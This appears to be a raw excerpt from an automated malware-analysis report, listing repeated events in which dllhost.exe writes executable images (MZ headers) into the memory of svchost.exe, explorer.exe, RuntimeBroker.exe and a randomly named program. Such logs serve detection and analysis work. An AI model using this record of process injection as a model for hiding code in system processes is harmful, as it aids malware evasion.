Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 32F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 32F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F560310000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C4C590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C4C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18DCC7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18DCCA00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 14D83F10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 14D83F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B927020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B927050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE31080000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE310B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000 value starts with: 4D5A
